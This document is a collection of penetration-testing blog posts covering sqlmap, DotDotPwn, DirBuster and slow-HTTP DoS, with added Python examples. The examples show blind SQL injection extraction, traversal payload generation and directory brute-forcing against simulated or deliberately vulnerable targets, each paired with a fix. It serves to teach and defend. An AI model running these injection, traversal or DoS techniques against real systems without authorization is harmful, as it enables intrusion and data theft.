BackTrack 5 R1 released

The BackTrack team has released BackTrack 5 R1, an updated version of BackTrack 5 with many new tools and updates. For more information, see the links below.

http://www.backtrack-linux.org/backtrack/backtrack-5-r1-released/

http://www.backtrack-linux.org/downloads/

Weaponizing Your Nokia N900 Mobile

Here is a list of tools and guides for weaponizing your Nokia N900:

1. Weaponizing the Nokia N900 – Part 1

https://www.infosecisland.com/blogvi…00-Part-1.html

2. Weaponizing the Nokia N900 – Part 2

https://www.infosecisland.com/blogvi…00-Part-2.html

3. Weaponizing the Nokia N900 – Part 3

https://www.infosecisland.com/blogvi…00-Part-3.html

4. Weaponizing the Nokia N900 – Part 3.5

http://zitstif.no-ip.org/?p=451

5. Weaponizing the Nokia N900 – Part 3.6 – Portable Rogue AP Point

http://zitstif.no-ip.org/?p=459

6. Weaponizing the Nokia N900 – Part 3.7 – More goodness and packet injection!

http://zitstif.no-ip.org/?p=473

7. Weaponizing the Nokia N900 – Part 3.8 – Backtrack 5 on N900

http://zitstif.no-ip.org/?p=484

BackTrack 5 Released

Finally

The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks.

This new revision has been built from scratch, and boasts several major improvements over all our previous releases.

http://www.backtrack-linux.org/backt…rack-5-release

http://www.backtrack-linux.org/downloads/

Direct Downloads

http://mirrors.rit.edu/backtrack/

OWASP HTTP Post Tool (layer 7 DoS)

The OWASP HTTP Post Tool was created to let you test your own web applications for availability problems caused by slow HTTP GET and HTTP POST denial-of-service attacks, in which a client opens many connections and sends each request (or its body) very slowly so that the server's worker threads stay tied up.

Project

http://code.google.com/p/owasp-dos-http-post/downloads/list

Also see the SpiderLabs (ModSecurity) guidance on mitigating slow HTTP DoS attacks:

http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-mitigating-slow-http-dos-attacks.html
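To make the attack and the mitigation concrete, here is an added Python simulation; it is not part of the original post, the OWASP tool, or the SpiderLabs article. It models a constructed slow client that announces a large Content-Length and drips the body one byte at a time on a simulated clock (no sockets, no sleeping), a naive body reader that stays blocked for as long as bytes keep arriving, and a minimum-rate reader following the Apache mod_reqtimeout semantics of RequestReadTimeout body=20,MinRate=500 (an initial 20 s deadline, extended by 1/500 s per byte received). The mod_reqtimeout numbers are an assumption chosen for illustration; the page itself does not name that directive.

```python
"""Slow HTTP POST in miniature: a client announces a big Content-Length and
drips the body a byte at a time. A naive body reader stays blocked for as
long as bytes keep arriving; a minimum-rate reader (mod_reqtimeout-style
'body=20,MinRate=500' semantics, assumed for illustration) drops the
connection. Simulated clock, no real sockets; added example, not the OWASP
tool's code."""


class SlowClient:
    """Constructed client: delivers one body byte every `interval` simulated seconds."""

    def __init__(self, content_length, interval):
        self.content_length = content_length
        self.interval = interval
        self.sent = 0
        self.now = 0.0  # simulated wall clock, seconds

    def recv(self, bufsize):
        # A real recv() would block here; we just advance the clock instead.
        if self.sent >= self.content_length:
            return b""
        self.now += self.interval
        self.sent += 1
        return b"A"


def read_body_naive(client, max_wait):
    """Reads until Content-Length is satisfied, with no idea of how slowly
    bytes arrive. max_wait only exists so the demo terminates; a real worker
    thread would sit here until the client closes."""
    buf = bytearray()
    while len(buf) < client.content_length:
        chunk = client.recv(4096)
        if not chunk:
            break
        buf += chunk
        if client.now >= max_wait:
            return ("still reading", client.now, len(buf))
    return ("complete", client.now, len(buf))


def read_body_min_rate(client, timeout=20.0, min_rate=500.0):
    """Initial `timeout` seconds to receive the body; every byte received
    extends the deadline by 1/min_rate seconds. A client sending slower than
    min_rate bytes/s cannot keep up with its own deadline and is dropped."""
    buf = bytearray()
    start = client.now
    deadline = start + timeout
    while len(buf) < client.content_length:
        chunk = client.recv(4096)
        if not chunk:
            break
        buf += chunk
        deadline += len(chunk) / min_rate
        if client.now > deadline:
            return ("aborted", client.now - start, len(buf))
    return ("complete", client.now - start, len(buf))


def demo():
    """Same 1 MB Content-Length at one byte every 10 s (the attack), plus a
    normal 5 KB upload at 1 KB/s to show a legitimate client still passes."""
    naive = read_body_naive(SlowClient(1_000_000, 10.0), max_wait=3600.0)
    slow = read_body_min_rate(SlowClient(1_000_000, 10.0))
    fast = read_body_min_rate(SlowClient(5_000, 0.001))
    return {"naive": naive, "min_rate_slow": slow, "min_rate_fast": fast}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:14s} -> {result}")
```

The naive reader is still waiting after an hour with 360 bytes in hand; the minimum-rate reader drops the same client after 30 seconds and three bytes, while the 1 KB/s upload completes normally. That is the whole point of a MinRate-style setting: it does not care how long the body takes, only whether the client is sending at a plausible speed.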

Using sqlmap for SQL Injection

We use many tools for SQL injection during pentests. Today we look at sqlmap, an open-source automatic SQL injection and database takeover tool that finds injection points and fingerprints the back-end database with few false positives. We will run it against the http://testphp.vulnweb.com demo site.

1) Database fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:52:47

[11:52:47] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:52:47] [INFO] resuming injection point 'GET' from session file
[11:52:47] [INFO] resuming injection parameter 'cat' from session file
[11:52:47] [INFO] resuming injection type 'numeric' from session file
[11:52:47] [INFO] resuming match ratio '0.701' from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5

[*] shutting down at: 11:52:48

2) Finding the database name and current user

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db --current-user

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:57:13

[11:57:13] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:57:13] [INFO] resuming injection point 'GET' from session file
[11:57:13] [INFO] resuming injection parameter 'cat' from session file
[11:57:13] [INFO] resuming injection type 'numeric' from session file
[11:57:13] [INFO] resuming match ratio '0.701' from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    'acuart@localhost'

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
current database:    'acuart'

[11:58:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 11:58:45

3) Enumerate databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:00:57

[12:00:58] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:00:58] [INFO] resuming injection point 'GET' from session file
[12:00:58] [INFO] resuming injection parameter 'cat' from session file
[12:00:58] [INFO] resuming injection type 'numeric' from session file
[12:00:58] [INFO] resuming match ratio '0.701' from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:00:58

4) Enumerate database tables and columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables --columns

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:03:27] [INFO] resuming injection point 'GET' from session file
[12:03:27] [INFO] resuming injection parameter 'cat' from session file
[12:03:27] [INFO] resuming injection type 'numeric' from session file
[12:03:27] [INFO] resuming match ratio '0.701' from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
[12:03:28] [INFO] fetching number of tables for database 'information_schema'
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

Enumerating these details with sqlmap is that easy. Two things worth noticing in the output: the "resuming ... from session file" lines mean sqlmap is reusing results from an earlier run against this target (pass --flush-session if you want it to re-test from scratch), and --tables --columns without a database name walks every database, which is why the last run starts with the 16 tables of information_schema; scope it with -D acuart --tables to get straight to the application's own data. Next I will cover more advanced sqlmap techniques.
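To show what sqlmap is actually doing in the runs above (the "numeric" injection type, the match ratio, and the slow character-by-character "retrieved:" lines), here is an added Python example; it is not sqlmap's code and not the demo site's code. It stands in for listproducts.php?cat= with an in-memory SQLite database and constructed tables (SQLite rather than the MySQL 5 behind the real site, so the extraction probe uses SQLite's unicode() and substr()), detects a boolean-based injection by comparing page similarity the way sqlmap's match ratio does, extracts a value through the TRUE/FALSE oracle by binary search on each byte, and shows the parameterised fix that makes the same test come back negative. The users table, its contents and the function names are all assumptions made for the example.

```python
"""What sqlmap is doing under the hood in the runs above: detect a
boolean-based (numeric) injection in a GET parameter by comparing page
similarity, then pull data out through the TRUE/FALSE oracle one byte at a
time. The target is an in-memory SQLite stand-in for listproducts.php?cat=,
with constructed data; added example, not sqlmap's or the demo site's code."""
import difflib
import sqlite3

# Constructed schema; the real demo site's tables are not on the page.
SCHEMA = """
CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
INSERT INTO products VALUES (1, 1, 'Painting A'), (2, 1, 'Painting B'), (3, 2, 'Sculpture');
CREATE TABLE users (uname TEXT, pass TEXT);
INSERT INTO users VALUES ('acuart', 'not-the-real-password');
"""


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def render(rows):
    items = "".join(f"<li>{name}</li>" for (name,) in rows)
    return f"<html><body><h1>Products</h1><ul>{items}</ul></body></html>"


def listproducts_vulnerable(conn, cat):
    """Assumed bug: the parameter is concatenated into the SQL text."""
    sql = "SELECT name FROM products WHERE cat=" + cat
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        rows = []  # a syntax error just gives an empty listing here
    return render(rows)


def listproducts_fixed(conn, cat):
    """Hardened: type-check the value and bind it; the SQL text never changes."""
    try:
        cat_int = int(cat)
    except ValueError:
        return render([])
    rows = conn.execute("SELECT name FROM products WHERE cat=?", (cat_int,)).fetchall()
    return render(rows)


def similarity(a, b):
    return difflib.SequenceMatcher(None, a, b).ratio()


def is_injectable(page, cat="1", threshold=0.98):
    """sqlmap's numeric/boolean test in one line of logic: appending a TRUE
    condition must leave the page as it was, a FALSE one must change it.
    The ratio plays the role of the 'match ratio' sqlmap prints."""
    base = page(cat)
    same = similarity(base, page(f"{cat} AND 1=1"))
    diff = similarity(base, page(f"{cat} AND 1=2"))
    return same >= threshold and diff < threshold


def blind_extract(page, subquery, cat="1", max_len=32):
    """Recover a string using only the TRUE/FALSE oracle: binary search on
    each byte value, about seven requests per character. That is why sqlmap
    needed well over a minute to 'retrieve' the current user above."""
    base = page(cat)
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{cat} AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            if similarity(base, page(probe)) >= 0.98:
                lo = mid + 1  # condition TRUE: the byte is larger than mid
            else:
                hi = mid
        if lo == 0:  # past the end: substr() is '' and unicode('') is NULL
            break
        out += chr(lo)
    return out


def demo():
    conn = new_db()
    vuln = lambda c: listproducts_vulnerable(conn, c)
    fixed = lambda c: listproducts_fixed(conn, c)
    user = blind_extract(vuln, "SELECT uname FROM users LIMIT 1")
    return is_injectable(vuln), is_injectable(fixed), user


if __name__ == "__main__":
    print(demo())  # (True, False, 'acuart')
```

Against the vulnerable handler the TRUE page is byte-identical to the original and the FALSE page loses its product list, so the detector fires and the oracle spells out the username one character at a time; against the bound-parameter version int() rejects the probe before it reaches the database, both probes return the same empty page, and the detector correctly reports nothing.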

Watobo on BackTrack4-RC2

BackTrack 4 R2 was recently released with many updates, but it does not ship Watobo, a tool I have used in many web application security assessments. Here is how to install it on a BackTrack box. Run the following commands from a terminal:

gem install rubygems-update -v 1.3.4
gem install hoe
gem install fxruby

Then install the FireWatir Firefox extension from here:

http://wiki.openqa.org/display/WTR/FireWatir+Installation

Download the latest Watobo version:

http://sourceforge.net/projects/watobo/

unzip watobo_0.9.5rev226.zip
cd watobo_0.9.5rev226
ruby start_watobo.rb

Done, Watobo is ready on BT4-RC2.

Find Websites Located on the Same Web Server

Below are links and tools that find the neighbours (other websites) hosted on the same server. This matters during a web application pentest: running a scanner without knowing what else is hosted on the box can overload the server, so every site on it goes down, an accidental DoS. Check first, then tune the scanner (threads, request rate, scope) to what you find.

1. http://www.yougetsignal.com/tools/web-sites-on-web-server/
2. Get the IP address of the website or server, then go to www.bing.com and search for ip:<server IP address> (for example ip:127.0.0.1 with the real address substituted). Bing will look up that address and list all the websites it has indexed on the same server.
3. Serverchk.py http://packetstormsecurity.org/UNIX/scanners/serverchk.rar
4. http://www.my-ip-neighbors.com/
5. If you are using Linux, bing-ip2hosts does the same Bing lookup from the command line:

$ ./bing-ip2hosts www.websitename.com

You can download it from http://www.morningstarsecurity.com/research/bing-ip2hosts

DotDotPwn v1.0 Directory Traversal Scanner tool

Tool intro:

1. Detects directory traversal vulnerabilities on remote HTTP/FTP servers.
2. Currently the traversal database holds 881 attack payloads. Use the -update flag to perform a fresh online update.
3. DotDotPwn checks for the presence of boot.ini on the vulnerable system through the traversal, so it assumes the tested systems are Windows-based HTTP/FTP servers (a Unix target will not register as a hit even if it is vulnerable).

How to use

It requires Perl with the HTTP::Lite module:

root@punter:/pentest/web# wget http://chr1x.sectester.net/toolz/ddpwn/ddpwn.tar.gz
root@punter:/pentest/web# tar -xvf ddpwn.tar.gz
root@punter:/pentest/web# perl -MCPAN -e 'install HTTP::Lite'
root@punter:/pentest/web# ./ddpwn.pl -http 192.168.0.103

Project: http://chr1x.sectester.net/toolz/ddpwn/
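To show how a traversal scanner of this kind works, and why the boot.ini assumption matters, here is an added Python example; it is not DotDotPwn's code. It builds a small traversal database (plain, backslash, URL-encoded and double-encoded dot-dot sequences at increasing depth) crossed with two target files, fires it at a server, and calls a payload a hit only when a known signature from the target file comes back. The "server" is a pair of constructed handlers over a fake Unix-like filesystem so the example runs offline: one that normalises the path and never checks where it landed, and the fixed one that rejects anything outside the web root. WEBROOT, FAKE_FS, the payload table and the function names are assumptions for the example.

```python
"""Directory traversal scanning in the DotDotPwn style: a table of traversal
encodings crossed with a few target files, fired at a server, with a hit
declared when a known signature from the target file comes back. The
'servers' here are two constructed handlers over a fake filesystem so the
example runs offline; added example, not DotDotPwn's own code."""
import posixpath
import urllib.parse

WEBROOT = "/var/www"

# Constructed fake filesystem. It is Unix-like, so the boot.ini probes below
# can never hit: this is the DotDotPwn assumption (Windows target) made visible.
FAKE_FS = {
    "/var/www/index.html": "<html>welcome</html>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
}

# A small traversal database: plain, backslash, URL-encoded, double-encoded.
TRAVERSALS = ["../", "..\\", "%2e%2e%2f", "%2e%2e/", "..%2f",
              "%2e%2e%5c", "..%5c", "%252e%252e%252f"]

# Target file -> string that proves we really read it.
TARGETS = {"etc/passwd": "root:x:", "boot.ini": "[boot loader]"}


def payloads(max_depth=6):
    """Yield (path, signature) pairs for every encoding, depth and target."""
    for trav in TRAVERSALS:
        for depth in range(1, max_depth + 1):
            for target, sig in TARGETS.items():
                yield trav * depth + target, sig


def _resolve(path):
    # One round of URL decoding, backslash treated as a separator (as a
    # Windows server would), then joined under the web root and normalised.
    decoded = urllib.parse.unquote(path).replace("\\", "/")
    return posixpath.normpath(posixpath.join(WEBROOT, decoded))


def serve_vulnerable(path):
    """Assumed bug: normpath() happily walks above WEBROOT and nobody checks."""
    return FAKE_FS.get(_resolve(path), "404 Not Found")


def serve_fixed(path):
    """Hardened: after normalisation the path must still be inside WEBROOT."""
    full = _resolve(path)
    if posixpath.commonpath([WEBROOT, full]) != WEBROOT:
        return "403 Forbidden"
    return FAKE_FS.get(full, "404 Not Found")


def scan(serve, max_depth=6):
    """Return the payloads whose response carried the target's signature."""
    hits = []
    for path, sig in payloads(max_depth):
        if sig in serve(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    for p in scan(serve_vulnerable):
        print("VULNERABLE:", p)
    print("fixed server hits:", scan(serve_fixed))
```

Two things the run makes visible: depth matters (one ../ from /var/www only reaches /var, so the first hit needs two), and a server that decodes the URL once is not reached by the double-encoded %252e payloads at all, which is exactly why a real traversal database carries many encodings rather than one. Against the fixed handler every payload comes back 403 and the scan is empty.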

Microsoft Releases Advisory to fix LNK Vulnerability

Microsoft has released a complete advisory for the Windows Shell LNK (shortcut) vulnerability (MS10-046), with a detailed guide and the steps needed to fix it.

System administrators: make sure you follow the guide below and secure your systems against this threat.

http://support.microsoft.com/kb/2286198

Bruteforcing directories and file names on web application servers using DirBuster

During a web application pentest, finding sensitive directories and files is always hard work.

What is DirBuster?

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Now I will show how to use DirBuster to find sensitive directories and files in a web application. For the demo I will use Mutillidae, a deliberately vulnerable set of PHP scripts that implement the OWASP Top 10.

1. cd /pentest/web/dirbuster
2. root@punter:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -u http://192.168.0.103/mutillidae/

Now browse and select a directory brute-force list, for example directory-list-1.0.txt.

Click Start and DirBuster will begin brute-forcing directories and files.

In the results it has found /mutillidae/passwords/accounts.txt.
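To show what a tool like DirBuster does under the GUI, here is an added Python example; it is not DirBuster's code. It probes a wordlist under a base URL with a thread pool (DirBuster is multi-threaded for the same reason) and, rather than trusting the status code, first requests a random name that cannot exist and treats anything that looks like that baseline as missing. That catches the common trap where a site answers 200 to everything and a naive brute-forcer reports the whole wordlist as found. The target is a constructed in-memory stand-in for the Mutillidae install on the page, so it runs offline; the wordlist, page contents and function names are assumptions.

```python
"""A miniature DirBuster: probe a wordlist of directory and file names under
a base URL with a thread pool, and decide 'exists' against a baseline rather
than trusting the status code alone, so a site that answers 200 to
everything (a 'soft 404') does not flood the results. The target is a
constructed in-memory site so the example runs offline; added example, not
DirBuster's own code."""
import difflib
import random
import string
from concurrent.futures import ThreadPoolExecutor

# Constructed wordlist; the real directory-list-1.0.txt is far larger.
WORDLIST = ["index.php", "admin", "images", "backup.zip", "robots.txt",
            "passwords", "passwords/accounts.txt", ".htaccess"]


def fake_site(existing, soft404=False):
    """Return a request(path) -> (status, body) function over `existing`.
    With soft404=True every miss still comes back as HTTP 200."""
    def request(path):
        if path in existing:
            return 200, f"<html><body>{existing[path]}</body></html>"
        if soft404:
            return 200, "<html><body><h1>Page not found</h1></body></html>"
        return 404, "<html><body>404</body></html>"
    return request


def not_found_baseline(request, base_url):
    """Ask for a name that cannot exist; whatever comes back is what 'missing' looks like."""
    junk = "".join(random.choices(string.ascii_lowercase, k=20))
    return request(base_url + junk)


def looks_missing(resp, baseline, threshold=0.9):
    status, body = resp
    b_status, b_body = baseline
    if status == 404:
        return True
    # Same status as the baseline and a near-identical body: a soft 404.
    return status == b_status and difflib.SequenceMatcher(None, body, b_body).ratio() >= threshold


def brute_force(request, base_url, wordlist, threads=8):
    """Multi-threaded probe of every word under base_url; returns (word, status) hits."""
    baseline = not_found_baseline(request, base_url)

    def probe(word):
        return word, request(base_url + word)

    hits = []
    with ThreadPoolExecutor(max_workers=threads) as pool:
        for word, resp in pool.map(probe, wordlist):
            if not looks_missing(resp, baseline):
                hits.append((word, resp[0]))
    return hits


def demo():
    # Constructed stand-in for the Mutillidae install used on the page.
    pages = {
        "/mutillidae/index.php": "Mutillidae",
        "/mutillidae/passwords/accounts.txt": "admin:adminpass (constructed)",
    }
    plain = brute_force(fake_site(pages), "/mutillidae/", WORDLIST)
    soft = brute_force(fake_site(pages, soft404=True), "/mutillidae/", WORDLIST)
    return sorted(plain), sorted(soft)


if __name__ == "__main__":
    print(demo())
```

Both runs report the same two hits, index.php and passwords/accounts.txt, even though the second site returns 200 for the six names that do not exist. When pointing a real brute-forcer at a target, do the equivalent manually first (request a nonsense path and look at what comes back) and set the tool's failure-detection options accordingly; otherwise the result list is as long as the wordlist.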
